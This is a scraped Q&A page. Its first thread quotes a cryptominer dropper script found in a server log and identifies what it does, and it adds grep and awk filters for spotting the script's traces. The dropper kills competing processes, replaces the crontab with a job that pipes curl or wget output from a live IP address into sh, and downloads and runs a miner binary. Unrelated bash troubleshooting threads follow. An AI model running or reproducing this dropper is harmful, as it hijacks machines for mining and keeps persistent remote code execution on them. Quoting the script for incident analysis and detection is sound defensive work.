Found this shell script was executed in my python server log. Can anyone tell me its purpose? - bash

The code below showed up in my python3 server log, on my Ubuntu 20.04 Linux desktop system. Is it just my suspicious nature, or was this an attempt to hack my computer?
cc=http://31.42.177.123
sys=sysrv005
bit=$(getconf LONG_BIT)
ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %
crontab -r
echo "*/30 * * * * (curl --user-agent curl_cron $cc||wget --user-agent wget_cron -q -O - $cc)|sh" | crontab -
#pkill -9 $sys
get() {
chattr -i $2; rm -rf $2
curl --user-agent curl_ldr$bit -fsSL $1 > $2 || wget --user-agent wget_ldr$bit -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
chmod +x $2
}
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
get 31.210.20.120/sysrvv $sys; ./$sys
fi

Yes, it's a Bitcoin miner.
31.42.177.123/... basically downloads the above shell script, which points to 31.210.20.120 to download the sysrvv file, which is a Bitcoin miner.
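
The persistence and process indicators visible in the script above can be checked with two small text filters. This is an added example, not part of the original question or answer; the function names are hypothetical, and the sample crontab, the ps lines and the host c2.example are constructed.

```shell
#!/bin/sh
# Added example: text filters for the indicators visible in the quoted script.
# Live use:  crontab -l | suspicious_cron ;  ps -eo pid,args | suspicious_pids

# Read crontab text on stdin; print entries that fetch with curl or wget and
# pipe the download straight into a shell (the "...)|sh" pattern of the script).
suspicious_cron() {
    grep -E '(curl|wget).*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Read "PID ARGS" lines on stdin; print PIDs whose command name is one the
# quoted script greps for: its own payload (sysrv + digits) and the names it
# kills (network00, network01, kthreaddi).
suspicious_pids() {
    awk '$2 ~ /(^|\/)(sysrv[0-9]+|network0[01]|kthreaddi)$/ { print $1 }'
}

# Constructed sample crontab: one benign download to a file, one entry shaped
# like the one the script installs, one benign pipe to logger.
SAMPLE_CRON='0 3 * * * wget -q -O /var/backups/list.txt https://example.org/list.txt
*/30 * * * * (curl --user-agent curl_cron http://c2.example||wget --user-agent wget_cron -q -O - http://c2.example)|sh
*/5 * * * * /usr/local/bin/check.sh | logger'

# Constructed sample of "ps -eo pid,args" output.
SAMPLE_PS='  PID COMMAND
  812 /usr/sbin/sshd -D
 4411 ./sysrv005
 4420 /usr/bin/python3 -m http.server
 4431 /tmp/kthreaddi'

echo "Crontab entries to review:"
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron

echo "PIDs to review:"
printf '%s\n' "$SAMPLE_PS" | suspicious_pids
```

A hit from either filter means the host needs a closer look; a clean result only shows that these particular names and this crontab pattern are absent.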

Related

Bash if -gt also triggered when values equal?

I want my script to check if it's already running in another instance:
$ cat test.sh
#!/bin/bash
ps -ef | grep -v grep | grep -i "test.sh" | grep bash
ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash
if [ `ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash` -gt 1 ]; then echo "There's another instance running."
else echo "Only this instance is running."
fi
However the output is
$ ./test.sh
noes 9503 7494 0 09:32 pts/1 00:00:00 /bin/bash ./test.sh
1
There's another instance running.
Clearly, 1 is not greater than 1, so why is the if condition triggered?
Thanks
From test man page:
INTEGER1 -gt INTEGER2
INTEGER1 is greater than INTEGER2
So the answer is no, -gt is not triggered when values are equal. In fact, as you can see if you modify the script in this way:
$ cat test.sh
#!/bin/bash
ps -ef | grep -v grep | grep -i "test.sh" | grep bash
ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash
STRINGS=`ps -ef | grep -v grep | grep -i "test.sh"`
echo "$STRINGS"
COUNT=`ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash`
echo $COUNT
if [ `ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash` -gt 1 ]; then echo "There's another instance running."
else echo "Only this instance is running."
fi
You get this:
$ ./test.sh
lucio 5097 4736 0 10:10 pts/2 00:00:00 /bin/bash ./test.sh
1
lucio 5097 4736 0 10:10 pts/2 00:00:00 /bin/bash ./test.sh
lucio 5106 5097 0 10:10 pts/2 00:00:00 /bin/bash ./test.sh
2
There's another instance running.
If you modify the script in this way, it will work:
#!/bin/bash
ps -ef | grep -v grep | grep -i "test.sh" | grep bash
pgrep -c test.sh
if [ $(pgrep -c test.sh) -gt 1 ]; then
echo "There's another instance running."
else
echo "Only this instance is running."
fi
This is the output:
$ ./test.sh
lucio 5197 4736 0 10:17 pts/2 00:00:00 /bin/bash ./test.sh
1
Only this instance is running.
Note the use of $() instead of backticks. Check this answer for this change.

Can someone tell me what this line in the makefile does?

tar -x -v -z -f abc.tar.gz -C ~/libs/dl/ | cut -d '/' -f 1 | sort | uniq >> `dirname ~/libs/dl/`/.extracted_dirs

BASH - GREP - invert match not working

I'm trying to find the number of open file descriptors by user "apache". I would like to exclude ls: /proc/PID/fd: No such file or directory but the GREP exclusion is not working:
# for pid in $(lsof -u apache | awk '{ print $2 }' | uniq); do ls -1 /proc/$pid/fd | grep -v "No"; done | wc -l
ls: /proc/PID/fd: No such file or directory
1944
Try |& grep -v "No such file or directory"
Unlike |, |& will also redirect the error output of ls
Try:
for pid in $(lsof -u apache | tail -n +2 | awk '{ print $2 }' | uniq); do ls -1 /proc/$pid/fd ; done | wc -l

Verifying if a file exists (shell script)

This is my code:
nb_lignes=`wc -l $1 | cut -d " " -f1`
for i in $(seq $(($nb_lignes - 1)) )
do
machine=`head $1 -n $i | tail -1`
machine1=`head $1 -n $nb_lignes | tail -1`
ssh root@$machine -x " scp /home/file.txt root@$machine1:/home && rm -r /home/file.txt"
done
I'd like to verify that file.txt exists on the machine before the scp and rm. How can I modify this script?
Thank you.
You can use the test command: test -f file && scp ...
ssh root@$machine -x " test -f /home/file.txt && scp /home/file.txt root@$machine1:/home && rm -r /home/file.txt"

[: : bad number on the bash script

This is my bash script:
#!/usr/local/bin/bash -x
touch /usr/local/p
touch /usr/local/rec
DATA_FULL=`date +%Y.%m.%d.%H`
CHECK=`netstat -an | grep ESTAB | egrep '(13001|13002|13003|13004|13061|13099|16001|16002|16003|16004|16061|16099|18001|18002|18003|18004|18061|18099|20001|20002|20003|20004|20061|20099|13000|16000|18000|20000)' | awk '{ print $5 }' | sort -u | wc -l`
netstat -an | grep ESTAB | egrep '(13001|13002|13003|13004|13061|13099|16001|16002|16003|16004|16061|16099|18001|18002|18003|18004|18061|18099|20001|20002|20003|20004|20061|20099|13000|16000|18000|20000)' | awk '{ print $5 }' | sort -u | wc -l > /usr/local/www/p
STAT=`cat /usr/local/www/rec`
if [ "$CHECK" -gt "$STAT" ]; then
echo $CHECK"\n"$DATA_FULL > /usr/local/p
fi
Of course I've run chmod +x script.sh and then sh script.sh, then I receive the following message: [: : bad number.
Why does it happen?
Run your script using
sh -x script.sh
It'll print every line it executes and the variable output.
Run the netstat command and stat command outside and check.
If these are integer for sure, use this syntax,
if [ "0$(echo $CHECK|tr -d ' ')" -gt "0$(echo $STAT|tr -d ' ')" ];
A simple hack. Only works if $STAT is always either empty or positive number.
Are you sure that both STAT and CHECK are numbers that can be compared with -gt?
Probably your /usr/local/www/rec is empty. Try
STAT=`cat /usr/local/www/rec 2>/dev/null || echo 0`
maybe.
